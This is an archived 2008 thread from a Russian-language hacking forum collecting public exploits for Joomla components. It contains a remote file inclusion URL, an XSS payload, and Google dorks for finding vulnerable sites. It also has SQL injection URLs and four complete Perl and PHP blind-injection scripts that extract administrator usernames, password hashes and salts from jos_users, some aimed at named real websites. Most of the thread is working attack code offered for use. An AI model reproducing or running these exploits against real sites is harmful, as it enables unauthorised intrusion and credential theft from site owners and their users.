ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.04.2008, 01:04
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability
Сайт разработчика : www.elearningforce.biz
Сплоит : http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[код]
(с) NoGe
|
|
|
15.04.2008, 12:12
|
|
Banned
Регистрация: 15.04.2008
Сообщений: 6
Провел на форуме:
102258
Репутация:
30
|
|
Joomla Пасивная XSS компонент Traxartist
Уязвимость:
index.php?option=com_traxartist&task=playSongex&id =1">[xss]
Пример:
Код:
http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.coockie)</script>
found by it's my
Последний раз редактировалось иц май; 15.04.2008 в 13:25..
|
|
|
|
24.04.2008, 14:39
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Joomla Component FlippingBook 1.0.4 SQL Injection
DORK: inurl:com_flippingbook
Exploit:
Код:
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
(c)cO2
milw0rm.com
Joomla Component Filiale v. 1.0.4 SQL Injection
DORK: inurl:com_filiale
Exploit:
Код:
/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users
(c)Str0xo
milw0rm.com
Joomla Component Profiler <= 1.0.1 Blind SQL Injection
DORK: allinurl:com_comprofiler
Exploit:
Код:
/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
(c)$hur!k'n
milw0rm.com
Последний раз редактировалось Ded MustD!e; 24.04.2008 в 14:46..
|
|
|
|
27.04.2008, 19:30
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Joomla Component PaxxGallery Blind SQL Injection Exploit
"more than 1 row"
Vuln code:
PHP код:
.....
global $database;
$id = $_POST["id"];
$gid = $_POST["gid"];
if (isset($id)) {
.....
Exploit:
Код:
#!/usr/bin/perl
use strict;
use LWP::Simple;
print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n";
print "-+-- \"more than 1 row\" --+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gid= --+-\n";
print "-+-- Dork: option=com_paxxgallery --+-\n";
# Example:
# Url_Part_1: http://www.morganomega.com/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
# Url_Part_2: &iid=34
print "Url_Part_1:" ;
chomp(my $ur1=<STDIN>);
print "Url_Part_2:";
chomp(my $ur2=<STDIN>);
my $n=48;
my $i=1;
my $log= 1;
my ($content,$result) = undef;
my $request = 0;
while($log)
{
$content = get($ur1.'+and+1=(select+1+from+jos_users+where+length(if(ascii(upper(substring((select+password+from+jos_users+where+id=62),'.$i.',1)))='.$n.',password,id))>4)/*'.$ur2);
if($content =~ /Subquery returns more than 1 row/) {$result.=chr($n); $n=47; $i++;}
elsif($i==33 || $content =~ /doesn\'t exist/) {$log = 0}
else {$n++; if($n==58){$n=65} }
$request++;
}
print "Administrator hash: ".$result."\n";
print "REQUEST: ".$request;
Dork: option=com_paxxgallery
ZAMUT (c)
Последний раз редактировалось ZAMUT; 29.04.2008 в 01:11..
|
|
|
|
02.05.2008, 17:10
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Joomla Component Webhosting (catid) Blind SQL Injection Exploit
Exploit:
Код:
#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
$info{'info'} = {
"author" => ["cO2,Inphex"],
"name" => ["Joomla com_webhosting Blind SQL Injection"],
"version" => [],
"description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
"options" =>
{
"agent" => "",
"proxy" => "",
"default_headers" => [
["key","value"]],
"timeout" => 2,
"cookie" =>
{
"cookie" => ["key=value"],
},
},
"sending_options" =>
{
"host" => $host_,
"path" => $path_".index.php",
"port" => 80,
"method_a" => "SQL_INJECTION_BLIND",
"attack" =>
{
"option" => ["get","option","com_webhosting"],
"catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
"regex" => [[$non_find]],
},
},
};
&start($info{'info'},222);
open FH,">>ok.html";
print FH $return{222}{'content'};
sub start
{
$a_ = shift;
$id = shift;
$get_dA = get_d_p_s("get");
$post_dA = get_d_p_s("post");
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
my $jj = 1;
my $ii = 48;
my $hh = 1;
my $ppp = 0;
my $s = shift;
my $a = "";
my $res_p = "";
my $h = "";
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
$ua = LWP::UserAgent->new;
$ua->timeout($a_->{'options'}{'timeout'});
if ($a_->{'options'}{'proxy'}) {
$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
}
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
$ua->agent($agent);
{
while (($k,$v) = each(%{$a_}))
{
if ($k ne "options" && $k ne "sending_options")
{
foreach $r (@{$a_->{$k}})
{
if ($a_->{$k}[0])
{
print $k.":".$a_->{$k}[0]."\n";
}
}
}
}
foreach $j (@{$a_->{'options'}{'default_headers'}})
{
$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
$m++;
}
if ($a_->{'options'}{'cookie'}{'cookie'}[0])
{
$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
}
}
switch ($method_m)
{
case "attack" { &attack();}
case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
case "REMOTE_COMMAND_EXECUTION" { &attack();}
case "REMOTE_CODE_EXECUTION" {&attack();}
case "REMOTE_FILE_INCLUSION" { &attack();}
case "LOCAL_FILE_INCLUSION" { &attack(); }
else { &attack(); }
}
sub attack
{
if ($post_dA eq "") {
$method = "get";
} elsif ($post_dA ne "")
{
$method = "post";
}
if ($method eq "get") {
$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
} elsif ($method eq "post")
{
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
}
}
sub sql_injection_blind
{
syswrite STDOUT,$column.":";
while ()
{
while ($ii <= 90)
{
if(check($ii,$hh) == 1)
{
syswrite STDOUT,lc(chr($ii));
$hh++;
$chr = $chr.chr($ii);
}
$ii++;
}
push(@ffs,length($chr));
if (($#ffs -1) == $ffs)
{
print "\nFinished/Error\n";
exit;
}
$ii = 48;
}
}
sub check($$)
{
$ii = shift;
$hh = shift;
if (get_d_p_s("post") ne "")
{
$method = "post";
} else { $method = "get";}
if ($method eq "get")
{
$ppp++;
$query = modify($get_dA,$ii,$hh);
$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
} elsif ($method eq "post")
{
$ppp++;
$query_g = modify($get_dA,$ii,$hh);
$query_p = modify($post_dA,$ii,$hh);
$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
}
}
sub modify($$$)
{
$string = shift;
$replace_by = shift;
$replace_by1 = shift;
if ($string !~/\$i/ && $string !~/\$h/) {
print $string;
} elsif ($string !~/\$i/)
{
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
} elsif ($string !~/\$h/)
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
return $string;
} else
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
}
}
sub get_d_p_s
{
$g_d_p_s = shift;
$post_data = "";
$get_data = "";
$header_data = "";
%header_dA = ();
while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
{
if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
{
$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
{
$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
{
$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
}
$hp++;
}
$yy = $#get;
while ($bb <= $#get)
{
$get_data .= $get[$yy]."&";
$bb++;
$yy--;
}
$l = $#post;
while ($k <= $#post)
{
$post_data .= $post[$l]."&";
$k++;
$l--;
}
if ($g_d_p_s eq "get")
{
return $get_data;
}
elsif ($g_d_p_s eq "post")
{
return $post_data;
} elsif ($g_d_p_s eq "header")
{
return %header_dA;
}
}
sub get_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
return $req->content;
}
sub post_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
$content_type = shift;
$send = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
$req->content_type($content_type);
$req->content($send);
$res = $ua->request($req);
return $res->content;
}
}
# milw0rm.com [2008-05-01]
milw0rm
|
|
|
|
11.05.2008, 18:41
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit
Код:
<?
//Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
//Greets: all members of antichat.ru & cih.ms
//options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url=$_GET['url'];
$where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1';
$id=(!empty($_GET['id']))?$_GET['id']:'1';
//functions
function send_xpl($url, $xpl){
global $id;
$u=parse_url($url);
$req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="User-Agent: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
$res=fread($fs, 4096);
fclose($fs);
return $res;
}
function xpl($condition, $pos){
global $norm_ua;
global $where;
$xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
return $xpl;
}
//main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
send_xpl($url, $norm_ua);
//get md5
for($i=0;$i<=32;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=102;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}
//check Joomla version
$test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff=send_xpl($url,$test);
if(preg_match('/Duplicate entry/', $buff)) die($pass);
//separator
$pass.=':';
//get salt
for($i=33;$i<=49;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
$buff=send_xpl($url, xpl('>91',$i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=122;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=65;$j<=90;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}
echo $pass;
Author : +toxa+
|
|
|
|
13.05.2008, 01:00
|
|
Участник форума
Регистрация: 23.01.2008
Сообщений: 182
Провел на форуме:
2268999
Репутация:
410
|
|
Joomla Component xsstream-dm 0.01 Beta SQL Injection
Код:
#!/usr/bin/perl -w
#########################################################
# Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection #
# download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24
#########################################################
########################################
#[*] Founded by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Dork inurl:"index.php?option=com_xsstream-dm"
#[*] Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs :)
########################################
#[*] Script_Name: "Joomla"
#[*] Component_Name: "xsstream-dm" 0.01 Beta
########################################
print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection #\n\n";
print "\t\t# by Houssamix & Stack-Terrorist #\n\n";
print "\t\t# from H-T Team & v4 Team #\n\n";
print "\t\t########################################################\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="jos_users";
#the the union of joomla
$un="/**/union/**/select/**/";
#the vulnerable compenent
$com="com_xsstream-dm&Itemid";
# Lets star exploiting
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/){
print "\n[+] Admin User : $1";
}
$host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";
}
else{print "\n[-] Exploit Failed...\n";}
# exploit discovered by Houssamix From H-T Team
# exploit exploited by Stack-Terrorist
(c) by Houssamix & Stack-Terrorist |
|
|
|
19.05.2008, 19:05
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Joomla Component com_galeria Remote SQL Injection Vulnerability
Код:
###############################################################
#
# joomla SQL Injection(com_galeria)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "com_galeria"
#
# DORK 2 : allinurl: id "com_galeria"
#
################################################################
EXPLOIT :
index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
|
|
|
|
21.05.2008, 10:49
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
Раскрытие префикса таблиц в компоненте datsogallery
есои при обращении к старнице
http://www.domain.ru/path/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
позвращается цифра, то при повторном обращении к странице, она выплюнет ошибку
DB function failed with error number 1062
Duplicate entry '1-83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ( 1, '83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' )
работает не на всех версиях
пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Последний раз редактировалось vp$; 21.05.2008 в 11:18..
|
|
|
|
21.05.2008, 17:48
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от vp$
Раскрытие префикса таблиц в компоненте datsogallery
есои при обращении к старнице
позвращается цифра, то при повторном обращении к странице, она выплюнет ошибку
работает не на всех версиях
пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Эм... Как бы ты этом и основан мой эксплойт=\ Только префикс у меня не играет роли, ибо #__ заменяется на текущий префикс при обработке его соответствующей функцией в джумле
__________________
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
